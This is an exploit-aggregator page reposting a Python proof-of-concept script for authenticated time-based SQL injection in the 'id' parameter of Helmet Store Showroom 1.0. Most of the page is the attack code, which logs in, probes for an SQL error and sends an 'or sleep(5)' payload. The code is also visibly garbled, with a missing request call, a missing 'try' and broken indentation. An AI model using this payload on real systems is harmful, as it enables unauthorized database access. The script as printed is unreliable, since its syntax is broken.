Edit Report

Our sensors found this exploit at:

Below is a copy:

Helmet Store Showroom 1.0 SQL Injection
# Exploit Title: Helmet Store Showroom  1.0 - authenticated SQL Injection
# Date: 25-11-2022
# Exploit Author: syad
# Vendor Homepage:
# Software Link:
# Version: 1.0
# Tested on: Windows 10 + XAMPP 3.2.4
# CVE ID : N/A

# Description

# The id parameter does not perform input validation on the view_product.php file it allow authenticated Time Based SQL Injection.

import requests
import sys
import pyfiglet
sess = requests.Session()

proxies = {"https": "", "http": ""}

def login1(ip,username,password):
    x  = "http://%s/hss/classes/Login.php?f=login" % ip
    login = {'username':username, 'password':password}
    r =, data=login, proxies=proxies)

def login(ip):
    x = ("http://%s/hss/admin") % ip
    r = sess.get(x,proxies=proxies)
    if "Welcome to Helmet Store Showroom - PHP" in r.text:
        print("[+] Success Login")

def detect_sql(ip):
    x = "http://%s/hss/admin/?page=products/view_product&id=2'" % ip
    r = sess.get(x,proxies=proxies)
    if "You have an error in your SQL syntax" in r.text:
        print("[+] Found SQL Error")

def time_based_sqli(ip):
    x = "http://%s/hss/admin/?page=products/view_product&id=2'+or+sleep(5)--+-" % ip
    r = sess.get(x,proxies=proxies)
    print("[+] Time Based SQL Found")
    print("[*]!!! Time To Report !!!")

if __name__ == "__main__":
    result = pyfiglet.figlet_format("PWN")
        ip = sys.argv[1].strip()
        username = sys.argv[2].strip()
        password = sys.argv[3].strip()
    except IndexError:
        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])
        print("[-] Example: %s 192.168.1.x"  % sys.argv[0])


Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.